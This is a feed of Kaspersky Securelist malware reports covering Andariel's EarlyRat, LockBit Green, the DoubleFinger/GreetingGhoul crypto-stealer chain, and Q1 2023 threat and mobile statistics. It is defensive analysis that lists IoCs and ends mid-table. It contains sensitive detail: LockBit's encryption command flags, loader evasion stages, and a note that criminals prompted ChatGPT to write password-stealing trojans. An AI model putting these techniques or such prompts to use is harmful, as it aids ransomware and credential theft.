Malware reports – Securelist https://securelist.com Wed, 28 Jun 2023 14:56:14 +0000 en-US hourly 1 https://wordpress.org/?v=6.2.2 https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png Malware reports – Securelist https://securelist.com 32 32 Andariel’s silly mistakes and a new malware family https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/ https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/#respond Wed, 28 Jun 2023 10:00:24 +0000 https://kasperskycontenthub.com/securelist/?p=110119

Introduction

Andariel, a part of the notorious Lazarus group, is known for its use of the DTrack malware and Maui ransomware in mid-2022. During the same period, Andariel also actively exploited the Log4j vulnerability as reported by Talos and Ahnlab. Their campaign introduced several new malware families, such as YamaBot and MagicRat, but also updated versions of NukeSped and, of course, DTrack.

While on an unrelated investigation recently, we stumbled upon this campaign and decided to dig a little bit deeper. We discovered a previously undocumented malware family and an addition to Andariel’s set of TTPs.

From initial infection to fat fingers

Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the C2 server. Unfortunately, we were unable to catch the first piece of malware they downloaded, but we did see that exploitation was closely followed by the DTrack backdoor being downloaded.

From this point on, things got rather interesting, as we were able to reproduce the commands the attackers executed. It quickly became clear that the commands were run by a human operator, and judging by the amount of mistakes and typos, likely an inexperienced one. For example:

Note how “Program” is misspelled as “Prorgam” . Another funny moment was when the operators realized they were in a system that used the Portuguese locale. This took surprisingly long: they only learned after executing cmd.еxe /c net localgroup as you can see below:

We were also able to identify the set of off-the-shelf tools Andariel that installed and ran during the command execution phase, and then used for further exploitation of the target. Below are some examples:

  • Supremo remote desktop;
  • 3Proxy;
  • Powerline;
  • Putty;
  • Dumpert;
  • NTDSDumpEx;
  • ForkDump;
  • And more which can be found in our private report.

Meet EarlyRat

We first noticed a version of EarlyRat in one of the aforementioned Log4j cases and assumed it was downloaded via Log4j. However, when we started hunting for more samples, we found phishing documents that ultimately dropped EarlyRat. The phishing document itself is not that advanced as can be seen below:

Once macros are enabled, the following command is executed:

Oddly enough, the VBA code pings a server associated with the HolyGhost / Maui ransomware campaign.

EarlyRat, just like many other RATs (remote access Trojans), collects system information upon starting and sends it to the C2 using the following template:

As can be seen above, there are two different parameters in the request: “id” and “query”. Next to those, the “rep0” and “page” parameters are also supported. They are used in the following cases:

  • id: unique ID of the machine used as a cryptographic key to decrypt value from “query”
  • query: the actual content. It is Base64 encoded and rolling XORed with the key specified in the “id” field.
  • rep0: the value of the current directory
  • page: the value of the internal state

In terms of functionality, EarlyRat is very simple. It is capable of executing commands, and that is about the most interesting thing it can do. There is a number of high-level similarities between EarlyRat and MagicRat. Both are written using a framework: QT is used for MagicRat and PureBasic, for EarlyRat. Also, the functionality of both RATs is very limited.

Conclusion

Despite being an APT group, Lazarus is known for performing typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated. Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware.

Focusing on TTPs as we did with Andariel helps to minimize attribution time and detect attacks in their early stages. This information can also help in taking proactive countermeasures to prevent incidents from happening.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals, or if you have questions about our private reports, reach out to us at crimewareintel@kaspersky.com.

]]>
https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/feed/ 0 full large medium thumbnail
LockBit Green and phishing that targets organizations https://securelist.com/crimeware-report-lockbit-switchsymb/110068/ https://securelist.com/crimeware-report-lockbit-switchsymb/110068/#respond Thu, 22 Jun 2023 10:00:01 +0000 https://kasperskycontenthub.com/securelist/?p=110068

Introduction

In recent months, we published private reports on a broad range of subjects. We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these. If you have questions or need more information about our crimeware reporting service, contact crimewareintel@kaspersky.com.

Phishing and a kit

Recently we stumbled upon a Business Email Compromise (BEC) case, active since at least Q3 2022. The attackers target German-speaking companies in the DACH region. As in many other BEC cases, they register a domain name that is similar to that used by the attacked organization and typically differs in one or two letters. For reasons unknown, the Reply-to field contains a different email address from the From field. The Reply-to email address does not mimic the target-organization’s domain.

In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.

At the end of this past January, we observed a spike in phishing email from a campaign targeting business users, which we have closely monitored. We noticed that the message contained a link to an “email confirmation form”. If one clicked on the link, they found themselves on a page looking very similar to that of the recipient’s domain. The phishing kit was designed to serve multiple campaigns at a time while running one instance on the web server. This was easily demonstrated by modifying the page URL, specifically the reference to the targeted user in it^ the layout of the phishing page would change.

An example of a SwitchSymb-generated phishing page

An example of a SwitchSymb-generated phishing page

LockBit Green

LockBit is one of the most prolific ransomware groups currently active, targeting businesses all over the world. Over time, they have adopted code from other ransomware gangs, such as BlackMatter and DarkSide, making it easier for potential affiliates to operate the ransomware.

Starting in this past February, we have detected a new variant, named “LockBit Green”, which borrows code from the now-defunct Conti gang. According to the Kaspersky Threat Attribution Engine (KTAE), LockBit incorporates 25% of Conti code.

KTAE shows similarities between LockBit Green and Conti

KTAE shows similarities between LockBit Green and Conti

Three pieces of adopted code really stand out: the ransomware note, the command line options and the encryption scheme. Adopting the ransom note makes the least sense. We could not think of a good reason for doing so, but nevertheless, LockBit did it. In terms of command line options, the group added those from Conti to make them available in Lockbit. All the command line options available in Lockbit Green are:

Flag Functionality
-p folder Encrypt the selected folder using a single thread
-m local Encrypt all available drives within multiple threads, each of them
-m net Encrypt all network shares within multiple threads, each of them
-m all Encrypt all available drives and Network shares within multiple threads, each of them
-m backups Flag not available to use on the detected versions but coded inside the ransomware
-size chunk Functionality to encrypt only part of the files
-log file.log Possibility to log every action performed by the ransomware
-nomutex Skip mutex creation

Finally, LockBit adopted the encryption scheme from Conti. The group now usesa custom ChaCha8 implementation to encrypt files with a randomly generated key and nonce that are saved/encrypted with a hard-coded public RSA key.

Binary diffing across the two families

Binary diffing across the two families

Multi-platform LockBit

We recently stumbled on a ZIP file, uploaded to a multiscanner, that contained LockBit samples for multiple architectures, such as Apple M1, ARM v6, ARM v7, FreeBSD and many others. The next question would obviously be, “What about codebase similarity?”.

For this, we used the KTAE: simply throwing in the downloaded ZIP file was enough to see that all the samples were derived from the LockBit Linux/ESXi version, which we wrote about in an earlier private report.

Source code shared with LockBit Linux

Source code shared with LockBit Linux

Further analysis of the samples led us to believe that LockBit were in the process of testing their ransomware on various architectures, instead of deploying it in the wild. For instance, the macOS sample was unsigned, so it could not be executed as is. Also, the string encryption method was simple: one byte XOR.

Nevertheless, our findings suggest that LockBit will target more platforms in the wild in the (near) future.

Conclusion

The world of cybercrime is huge, consisting of many players and gangs that are fluid in terms of composition. Groups adopt other groups’ code, and affiliates — which can be considered cybercrime groups in their own right — switch between different types of malware. Groups work on upgrades to their malware, adding features and providing support for multiple, previously unsupported, platforms, a trend that existed for some time now.

When an incident occurs, it is important to find out who has targeted you. This helps to limit the scope of incident response and could help to prevent further damage. The KTAE attributes code to cybercrime groups and highlights features shared by different malware families. This information can also help in taking proactive countermeasures to prevent incidents from happening in the future.

Finally, criminals often resort to old tricks, such as phishing, which, nevertheless, remain highly effective. Being aware of the latest trends can prevent threats like BEC from materializing.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals or have questions about our private reports, contact crimewareintel@kaspersky.com.

]]>
https://securelist.com/crimeware-report-lockbit-switchsymb/110068/feed/ 0 full large medium thumbnail
Sneaky DoubleFinger loads GreetingGhoul targeting your cryptocurrency https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/ https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/#comments Mon, 12 Jun 2023 10:00:57 +0000 https://kasperskycontenthub.com/securelist/?p=109982

Introduction

Stealing cryptocurrencies is nothing new. For example, the Mt. Gox exchange was robbed of many bitcoins back in the beginning of 2010s. Attackers such as those behind the Coinvault ransomware were after your Bitcoin wallets, too. Since then, stealing cryptocurrencies has continued to occupy cybercriminals.

One of the latest additions to this phenomenon is the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger’s loader stages.

DoubleFinger stage 1

The first stage is a modified “espexe.exe” (MS Windows Economical Service Provider Application) binary, where the DialogFunc is patched so that a malicious shellcode is executed. After resolving API functions by hash, which were added to DialogFunc, the shellcode downloads a PNG image from Imgur.com. Next, the shellcode searches for the magic bytes (0xea79a5c6) in the downloaded image, locating the encrypted payload within the image.

Real DialogFunc function (left) and patched function with shellcode (right) Real DialogFunc function (left) and patched function with shellcode (right)

Real DialogFunc function (left) and patched function with shellcode (right)

The encrypted payload consists of:

  1. A PNG with the fourth-stage payload;
  2. An encrypted data blob;
  3. A legitimate java.exe binary, used for DLL sideloading;
  4. The DoubleFinger stage 2 loader.

DoubleFinger stage 2

The second-stage shellcode is loaded by executing the legitimate Java binary located in the same directory as the stage 2 loader shellcode (the file is named msvcr100.dll). Just as the first stage, this file is a legitimate patched binary, having similar structure and functionality as the first stage.

To no one’s surprise, the shellcode loads, decrypts and executes the third stage shellcode.

DoubleFinger stage 3

The third-stage shellcode differs greatly from the first and second stages. For example, it uses low-level Windows API calls, and ntdll.dll is loaded and mapped in the process memory to bypass hooks set by security solutions.

Next step is to decrypt and execute the fourth-stage payload, located in the aforementioned PNG file. Unlike the downloaded PNG file, which does not display a valid image, this PNG file does. The steganography method used is, however, rather simple, as the data is retrieved from specific offsets.

The aa.png file with embedded Stage 4

The aa.png file with embedded Stage 4

DoubleFinger stage 4

The stage 4 shellcode is rather simple. It locates the fifth stage within itself and then uses the Process Doppelgänging technique to execute it.

DoubleFinger stage 5

The fifth stage creates a scheduled task that executes the GreetingGhoul stealer every day at a specific time. It then downloads another PNG file (which is actually the encrypted GreetingGhoul binary prepended with a valid PNG header), decrypts it and then executes it.

GreetingGhoul & Remcos

GreetingGhoul is a stealer designed to steal cryptocurrency-related credentials. It essentially consists of two major components that work together:

  1. A component that uses MS WebView2 to create overlays on cryptocurrency wallet interfaces;
  2. A component that detects cryptocurrency wallet apps and steals sensitive information (e.g. recovery phrases).

Examples of fake windows

Examples of fake windows

Examples of fake windows

With hardware wallets, a user should never fill their recovery seed on the computer. A hardware wallets vendor will never ask for that.

Next to GreetingGhoul we also found several DoubleFinger samples that downloaded the Remcos RAT. Remcos is a well-known commercial RAT often used by cybercriminals. We’ve seen it being utilized in targeted attacks against businesses and organizations.

Victims & Attribution

We found several pieces of Russian text in the malware. The first part of the C2 URL is “Privetsvoyu” which is a misspelled transliteration of the Russian word for “Greetings.” Secondly, we found the string “salamvsembratyamyazadehayustutlokeretodlyagadovveubilinashusferu.” Despite the weird transliteration, it roughly translates to: “Greetings to all brothers, I’m suffocating here, locker is for bastards, you’ve messed up our area of interest.”

Looking at the victims, we see them in Europe, the USA and Latin America. This is in accordance with the old adage that cybercriminals from CIS countries don’t attack Russian citizens. Although the pieces of Russian text and the victimology are not enough to conclude that the ones behind this campaign are indeed from the post-Soviet space.

Conclusion

Our analysis of the DoubleFinger loader and GreetingGhoul malware reveals a high level of sophistication and skill in crimeware development, akin to advanced persistent threats (APTs). The multi-staged, shellcode-style loader with steganographic capabilities, the use of Windows COM interfaces for stealthy execution, and the implementation of Process Doppelgänging for injection into remote processes all point to well-crafted and complex crimeware. The use of Microsoft WebView2 runtime to create counterfeit interfaces of cryptocurrency wallets further underscores the advanced techniques employed by the malware.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals, or have questions about our private reports, please contact crimewareintel@kaspersky.com.

Indicators of compromise

DoubleFinger
a500d9518bfe0b0d1c7f77343cac68d8
dbd0cf87c085150eb0e4a40539390a9a
56acd988653c0e7c4a5f1302e6c3b1c0
16203abd150a709c0629a366393994ea
d9130cb36f23edf90848ffd73bd4e0e0

GreetingGhoul
642f192372a4bd4fb3bfa5bae4f8644c
a9a5f529bf530d0425e6f04cbe508f1e

C2
cryptohedgefund[.]us

]]>
https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/feed/ 1 full large medium thumbnail
IT threat evolution Q1 2023 https://securelist.com/it-threat-evolution-q1-2023/109838/ https://securelist.com/it-threat-evolution-q1-2023/109838/#respond Wed, 07 Jun 2023 08:00:34 +0000 https://kasperskycontenthub.com/securelist/?p=109838

Targeted attacks

BlueNoroff introduces new methods bypassing MotW

At the close of 2022, we reported the recent activities of BlueNoroff, a financially motivated threat actor known for stealing cryptocurrency. The threat actor typically exploits Word documents, using shortcut files for the initial intrusion. However, recently the group has adopted new methods to deliver its malware.

One of these, designed to evade the Mark-of-the-Web (MotW) flag, is the use of .ISO (optical disk image) and .VHD (virtual hard disk) file formats. MotW is a Windows security measure — the system displays a warning message when someone tries to open a file downloaded from the internet.

The threat actor also seems to be experimenting with new file types to deliver its malware. We observed a new Visual Basic script, a previously unseen Windows Batch file and a Windows executable.

Novel infection chain

Our analysis revealed more than 70 domains used by this group, meaning that they were very active until recently. They also created numerous fake domains that look like venture capital and bank domains: most of these imitate Japanese venture capital companies, indicating that the group has an extensive interest in Japanese financial entities.

Roaming Mantis implements new DNS changer

We continue to track the activities of Roaming Mantis (aka Shaoye), a well-established threat actor targeting countries in Asia. From 2019 to 2022, this threat actor mainly used ‘smishing’ to deliver a link to its landing page, with the aim of controlling infected Android devices and stealing device information, including user credentials.

However, in September 2022, we analyzed the new Wroba.o Android malware, used by Roaming Mantis, and discovered a DNS changer function that was implemented to target specific Wi-Fi routers used mainly in South Korea.

Infection flow with DNS hijacking

This can be used to manage all communications from devices using a compromised Wi-Fi router with the rogue DNS settings — for example, to redirect someone to malicious hosts and interfere with security product updates. People connect infected Android devices to free, public Wi-Fi in such places as cafes, bars, libraries, hotels, shopping malls, and airports. When connected to a targeted Wi-Fi model with vulnerable settings, the malware will compromise the router and affect other devices as well. As a result, it can spread widely in the targeted regions.

Since the start of the Russo-Ukrainian conflict, we have identified a significant number of geo-political cyber-attacks, as outlined in our overview of the cyber-attacks related to the conflict.

Last October, we identified an active infection of government, agriculture and transportation organizations located in Donetsk, Lugansk and Crimea. The initial vector of compromise is unclear, but the details of the next stage imply the use of spear-phishing or something similar. The targets navigated to a URL pointing to a ZIP archive hosted on a malicious web server. This archive contained two files: a decoy document (we discovered PDF, XLSX and DOCX versions) and a malicious LNK file with a double extension (e.g. PDF.LNK) which, when opened, results in infection.

Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)

In several cases, the contents of the decoy document were directly related to the name of the malicious LNK, to trick the user into activating it

The LNK file downloads and installs a PowerShell backdoor called “PowerMagic”, which in turn deploys a sophisticated modular framework called “CommonMagic”. We discovered CommonMagic plugins capable of stealing files from USB devices as well as taking screenshots and sending them to the threat actor.

Infection chain

During our initial analysis, we were unable to find anything to connect the samples we found and the data used in the campaign to any previously known threat actor. However, our continuing investigations revealed more information about this threat, including links to other APT campaigns. You can find the details here.

Other malware

Prilex targets contactless credit card transactions

Prilex has evolved from ATM-focused malware into the most advance PoS threat we have seen so far. The threat actor goes beyond the old memory scrapers seen in PoS attacks, to highly advanced malware that includes a unique cryptographic scheme, real-time patching of target software, forcing protocol downgrades, manipulating cryptograms, performing so-called “GHOST transactions” and credit card fraud — even on chip-and-PIN cards.

While investigating an incident, we discovered new Prilex samples, and one of the new features included the ability to block contactless transactions. These transactions generate a unique identifier that’s valid for just one transaction, making them worthless to cybercriminals. By blocking the transaction, Prilex tries to force the customer to insert their card to make a chip-and-PIN transaction instead, allowing the cybercriminals to capture data from the card using their standard techniques.

With contactless card transactions increasing, this is a valuable technique that allows the Prilex threat actor to continue stealing card information.

The threat actor uses social engineering to infect a PoS terminal. They try to convince employees of a retail outlet that they urgently need to update the terminal’s software and to allow a “technical specialist” to visit the store, or at least provide remote access to the terminal. It’s important that retail organizations are alert to the signs of infection — including repeated failed contactless transactions — and educate staff about the methods used by cybercriminals to gain entry to their systems.

For retail companies (especially large networks with many branches), it’s important to develop internal regulations and explain to all employees exactly how technical support and/or maintenance crews should operate. This should at least prevent unauthorized access to POS-terminals. In addition, increasing employee’s awareness of the latest cyberthreats is always a good idea: that way they’ll be much less susceptible to new social engineering tricks.

Stealing cryptocurrency using a fake Tor browser

We recently discovered an ongoing cryptocurrency theft campaign affecting more than 15,000 users across 52 countries. The attackers used a technique that has been around for more than a decade and was originally used by banking Trojans to replace bank account numbers. However, in the recent campaign, the attackers used a Trojanized version of the Tor Browser to steal cryptocurrency.

The target downloads the Trojanized version of the Tor Browser from a third-party resource containing a password protected RAR archive — the password is used to prevent it being detected by security solutions. Once the file is dropped onto the target’s computer, it registers itself in the system’s auto-start and masquerades as an icon for a popular application, such as uTorrent.

Trojanized Tor Browser extracting and launching a malware payload

The malware waits until there is a wallet address in the clipboard and then replaces a portion of the entered clipboard contents with the cybercriminal’s own wallet address.

Our analysis of existing samples suggests that the estimated loss for those targeted in the campaign is at least $400,000, but the actual amount stolen could be much greater, as our research focused only on Tor Browser abuse. Other campaigns may use different software and malware delivery methods, as well as other types of wallets.

We haven’t been able to identify a single web site that hosts the installer, so it is probably distributed either via torrent downloads or some other software downloader. The installers coming from the official Tor Project are digitally signed and didn’t contain any signs of such malware. So, to stay safe, you should download software only from reliable and trusted sources. Even where someone has downloaded the Trojanized version, a good anti-virus product should be able to detect it.

There is also a way to check if your system is compromised with malware of the same class. Put the following “Bitcoin address” into Notepad:
bc1heymalwarehowaboutyoureplacethisaddress

Now press Ctrl+C and Ctrl+V. If the address changes to something else — the system is probably compromised by clipboard-injector malware and is dangerous to use.

Bitcoin address replaced by malware after pasting in an infected system

We would recommend that you scan your system with security software. If you want to have full confidence that no hidden backdoors remain, once a system has been compromised, you should not trust it until it has been rebuilt.

It seems that everyone’s chatting about ChatGPT

Since OpenAI opened up its large GPT-3 language model to the general public through ChatGPT, interest in the project has soared, as people rushed to explore its possibilities, including writing poetry, engaging in dialogue, providing information, creating content for web sites and more.

There has also been a good deal of discussion about the potential impact of ChatGPT on the threat landscape.

Given ChatGPT’s ability to mimic human interaction, it’s likely that automated spear-phishing attacks using ChatGPT are already taking place. ChatGPT allows attackers to generate persuasive, personalized e-mails on an industrial scale. Moreover, any responses from the target of the phishing message can easily be fed into the chatbot’s model, producing a compelling follow-up in seconds. That said, while ChatGPT may make it easier for cybercriminals to churn out phishing messages, it doesn’t change the nature of this form of attack.

Cybercriminals have also reported on underground hacker forums how they have used ChatGPT to create new Trojans. Since the chatbot is able to write code, if someone describes a desired function (for example, “save all passwords in file X and send via HTTP POST to server Y”), they can create a simple infostealer without having any programming skills. However, such Trojans are likely to be primitive and could contain bugs that make it less effective. For now, at least, chatbots can only compete with novice malware writers.

We also uncovered a malicious campaign that sought to exploit the growing popularity of ChatGPT. Fraudsters created social network groups that mimicked communities of enthusiasts. These groups also contained fake credentials for pre-created accounts that purported to provide access to ChatGPT. The groups contained a plausible link inviting people to download a fake version of ChatGPT for Windows.

The malicious link installs a Trojan that steals account credentials stored in Chrome, Edge, Firefox, Brave and other browsers.

Since security researchers frequently publish reports about threat actors, including TTPs (Tactics, Techniques and Procedures) and other indicators, we decided to try to find out what ChatGPT already knows about threat research and whether it can help common malicious tools and IoCs (Indicators of Compromise), such as malicious hashes and domains.

The responses for host-based artifacts looked promising, so we instructed ChatGPT to write some code to extract various metadata from a test Windows system and then to ask itself whether the metadata was an IoC:

Since certain code snippets were handier than others, we continued developing this proof of concept manually: we filtered the output for events where the ChatGPT response contained a “yes” statement regarding the presence of an IoC, added exception handlers and CSV reports, fixed small bugs and converted the snippets into individual cmdlets, which produced a simple IoC scanner, HuntWithChatGPT.psm1, capable of scanning a remote system via WinRM.

While the exact implementation of IoC scanning may not currently be a very cost-effective solution at $15 to £20 per host for the OpenAI API, it shows interesting interim results, and reveals opportunities for future research and testing.

The impact of AI on our lives will extend far beyond the current capabilities of ChatGPT and other current machine learning projects. Ivan Kwiatkowski, a researcher in our Global Research and Analysis Team, recently explored the likely scope of the changes we can expect in the long term. These perspectives not only include the productivity gains offered by AI, but the social, economic and political implications of the changes it is likely to usher in.

Tracking our digital footprints

We’ve become used to service providers, marketing agencies and analytical companies tracking our mouse clicks, social media posts and browser and streaming services history. Companies do this for a number of reasons. They want to understand our preferences better, and suggest products and services that we’re more likely to buy. They do it to find out which images or text we focus on most. They also sell on our online behavior and preferences to third parties.

The tracking is done using web beacons (aka tracker pixels and spy pixels). The most popular tracking technique is to insert a tiny image –1×1 or even 0x0 pixels in size — into an e-mail, application, or web page. The e-mail client or browser makes a request to download the image from the server by transmitting information about you, which the server records. This includes the time, device, operating system, browser, and the page from which the pixel was downloaded. This is how the operator of the beacon learns that you opened the e-mail or web page, and how. Often a small piece of JavaScript inside the web page, which can collect even more detailed information, is used instead of a pixel. These beacons, placed on every page or application screen, make it possible for companies to follow you wherever you go on the web.

In our recent report on web trackers, we listed the 20 most common beacons found on web sites and in e-mail. The data for web beacons is based on anonymous statistics from the Do Not Track (DNT) component of Kaspersky consumer products, which blocks the loading of web site trackers. Most of the companies have at least some connection to digital advertising and marketing, including tech giants such as Google, Microsoft, Amazon and Oracle.

The data for e-mail beacons is from anonymized anti-spam detection data from Kaspersky mail products. The companies in the list are either e-mail service providers (ESP) or customer relationship management (CRM) companies.

The information collected using trackers is of value not just to legitimate companies, but also to cybercriminals. If they are able to obtain such information — for example, as result of a data leak — they can use it to hack online accounts or send fake e-mails. In addition, attackers make use of web beacons too. You can find information on how to protect yourself from tracking here.

Malvertising through search engines

In recent months, we have observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, abused the search engine promotion plan in order to deliver malicious payloads to victims’ computers.

Fake AMD and Blender 3D websites in search results

They seem to be using the same technique of mimicking a web site associated with well-known software, such as Notepad++ and Blender 3D. The threat actors create copies of legitimate software web sites and use “typosquatting” (using incorrectly spelled brands or company names as URLs) or “combosquatting” (as above, but adding arbitrary words as URLs) to make the sites look legitimate. They then pay to promote the site in the search engine in order to push it to the top of search results — a technique known as “malvertising”.

Fake Blender 3D web pages

The distribution of malware that we have seen suggests that threat actors are targeting victims, both individual and corporate, across the globe.

]]>
https://securelist.com/it-threat-evolution-q1-2023/109838/feed/ 0 full large medium thumbnail
IT threat evolution Q1 2023. Mobile statistics https://securelist.com/it-threat-evolution-q1-2023-mobile-statistics/109893/ https://securelist.com/it-threat-evolution-q1-2023-mobile-statistics/109893/#respond Wed, 07 Jun 2023 08:00:26 +0000 https://kasperskycontenthub.com/securelist/?p=109893

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q1 2023:

  • 4,948,522 mobile malware, adware and riskware attacks were blocked.
  • The most common threat to mobile devices was adware: 34.8% of all detected threats.
  • 307,529 malicious installation packages were detected, of which:
    • 57,601 packages were related to mobile banking Trojans,
    • 1767 packages were mobile ransomware Trojans.

Quarterly highlights

Malware, adware and unwanted software attacks on mobile devices were down slightly year-on-year. Kaspersky mobile security systems thwarted a total of 4.9 million attacks in Q1 2023.

Number of attacks targeting users of Kaspersky mobile solutions, Q3 2021–Q1 2023 (download)

During the period in question, we detected several mobile photo editors on Google Play, which, besides their legitimate features, contained a dropper hidden inside a heavily obfuscated library. The dropper payload was designed to subscribe the user to paid services and intercept notifications.

We assigned our new find the verdict of Trojan.AndroidOS.Subscriber.aj and alerted Google Play, which then took down the malicious files. Kaspersky systems detect new files associated with this Trojan as Trojan.AndroidOS.Fleckpe.

Also in the first quarter, we came across what we designated as Trojan.AndroidOS.Bithief.f, a malicious modification of Skype that stole the victim’s cryptocurrency. The Trojan monitors the contents of the clipboard on the user’s computer and sends any crypto wallet addresses that it detects to the command-and-control server. The server responds with the hacker’s wallet address, so the malware substitutes that for the user’s address. And then inattentive users send their cryptocurrency to the wrong guys.

Mobile threat statistics

After a noticeable decrease in malicious installers in Q4 2022 due to reduced activity by Trojan-Dropper.AndroidOS.Ingopack, we observed a minor increase in new malware varieties.

Number of detected malicious installation packages, Q1 2022–Q1 2023 (download)

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q4 2022 and Q1 2023 (download)

Adware was back at the top of the rankings with 34.8%. The most widespread adware families in Q1 2023 were MobiDash (22.5%), HiddenAd (21.9%) and Adlo (12.4%).

Share of users attacked by a certain type of threat out of all attacked mobile users in Q4 2022 and Q1 2023 (download)

The share of users attacked by mobile Trojans increased in the first quarter, mostly due to the malware that we detect as Trojan.AndroidOS.Fakemoney.v and Trojan.AndroidOS.Adinstall.l. The former is a fake investment app that harvests victims’ payment details, and the latter, adware that comes pre-installed on certain devices, capable of downloading and running code (typically ads).

TOP 20 mobile malware programs

Note that the malware rankings below exclude riskware or PUAs, such as RiskTool or adware.

Verdict %* Q4 2022 %* Q1 2023 Difference in pp Change in ranking
1 DangerousObject.Multi.Generic 16.52 13.27 -3.24
2 Trojan-Spy.AndroidOS.Agent.acq 4.29 8.60 +4.31 +5
3 Trojan.AndroidOS.Boogr.gsh 6.92 8.39 +1.47 +1
4 Trojan.AndroidOS.Fakemoney.v 1.13 7.48 +6.35 +19
5 Trojan.AndroidOS.GriftHorse.l 8.29 6.13 -2.17 -3
6 Trojan.AndroidOS.Generic 7.68 5.95 -1.73 -3
7 Trojan-Dropper.AndroidOS.Hqwar.hd 3.06 4.54 +1.49 +2
8 Trojan-Downloader.AndroidOS.Agent.mh 0.00 3.68 +3.68
9 Trojan-Spy.AndroidOS.Agent.aas 6.18 3.64 -2.53 -3
10 DangerousObject.AndroidOS.GenericML 2.37 3.46 +1.10
11 Trojan.AndroidOS.Adinstall.l 0.28 3.36 +3.08
12 Trojan-Dropper.AndroidOS.Agent.sl 3.50 2.10 -1.40 -4
13 Trojan.AndroidOS.Fakemoney.u 0.67 1.64 +0.97 +25
14 Trojan-Banker.AndroidOS.Bian.h 1.43 1.52 +0.10 +3
15 Trojan-Dropper.AndroidOS.Hqwar.gen 1.25 1.47 +0.22 +6
16 Trojan-Downloader.AndroidOS.Agent.kx 1.53 1.43 -0.10 -3
17 Trojan-SMS.AndroidOS.Fakeapp.d 6.43 1.32 -5.11 -12
18 Trojan.AndroidOS.Piom.auar 0.00 1.06 +1.06
19 Trojan-Dropper.AndroidOS.Wroba.o 1.51 1.03 -0.47 -4
20 Trojan-Dropper.AndroidOS.Hqwar.gf 0.14 0.98 +0.84

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

DangerousObject.Multi.Generic (13.27%), the verdict we assign to miscellaneous unrelated malware that we detect with our cloud technology, topped the rankings as usual. This was followed by Trojan-Spy.AndroidOS.Agent.acq (8.60%), a malicious modification of WhatsApp that secretly monitors notifications the user receives.

Trojan.AndroidOS.Boogr.gsh (8.39%), a collective verdict for miscellaneous malware we detect with our machine learning technology, was in third place. This verdict is analogous to DangerousObject.AndroidOS.GenericML (3.46%), but unlike it, received through analysis of a similar file in the Kaspersky infrastructure.

Next were the previously mentioned fake investment app Trojan.AndroidOS.Fakemoney.v (7.48%) and the subscription Trojan described in many past reports — Trojan.AndroidOS.GriftHorse.l (6.13%).

Regional malware

This section describes mobile malware that mostly targets those who reside in certain countries.

Verdict Country* %**
Trojan-Banker.AndroidOS.Banbra.aa Brazil 99.43
Trojan-Spy.AndroidOS.SmsThief.td Indonesia 99.08
Trojan-Banker.AndroidOS.Bray.n Japan 99.07
Trojan-Banker.AndroidOS.Banbra.ac Brazil 98.85
Trojan-Banker.AndroidOS.Agent.la Turkey 98.62
Trojan.AndroidOS.Hiddapp.da Iran 97.82
Trojan.AndroidOS.Hiddapp.bk Iran 96.95
Trojan.AndroidOS.GriftHorse.ai Kazakhstan 96.26
Trojan-Dropper.AndroidOS.Hqwar.hc Turkey 95.93
Trojan.AndroidOS.FakeGram.a Iran 95.73
Trojan-SMS.AndroidOS.Agent.adr Iran 95.07
Trojan.AndroidOS.Hiddapp.bn Iran 95.01
Trojan.AndroidOS.Piom.aiuj Iran 90.33
Trojan-Banker.AndroidOS.Cebruser.san Turkey 88.28
Trojan.AndroidOS.Hiddapp.cg Iran 88.25
Backdoor.AndroidOS.Basdoor.c Iran 86.44
Trojan-Dropper.AndroidOS.Wroba.o Japan 83.80

* Country where the malware was most active
* Unique users attacked by the malware in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same malware

Members of the Banbra malware family continued to attack users in Brazil in Q1 2023. These are banking Trojans that abuse Accessibility features to interact with other applications installed on the device.

In Indonesia, users were exposed to spreading SmsThief.td SMS spies masquerading as public services, system apps or marketplaces.

Wroba banking Trojans, which we have covered several times, and the Bray mobile malware distributed under the guise of useful apps, such as call blockers, were busy in Japan.

Turkish users found themselves targeted by several banking Trojans, including the fairly primitive Agent.la and the well-known Cebruser. The Hqwar dropper operating in Turkey is also typically used to deliver various banking malware.

Users in Iran had to deal with hidden, hard-to-remove Hiddapp programs and the FakeGram family, third-party Telegram clients that automatically add users to channels they do not indent to join.

A variant of the GriftHorse subscription Trojan was mostly active in Kazakhstan. Focusing on users in a certain country is expected behavior for this Trojan family, as phishing messages used to lure the user into subscription to a fake service have to be localized.

Mobile banking Trojans

The number of banking Trojan installers began to increase again, exceeding 57,000 in Q1 2023.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q1 2022–Q1 2023 (download)

TOP 10 mobile bankers

Verdict %* Q4 2022 %* Q1 2023 Difference in pp Change in ranking
1 Trojan-Banker.AndroidOS.Bian.h 29.90 30.81 0.91
2 Trojan-Banker.AndroidOS.Faketoken.pac 6.31 10.15 3.84
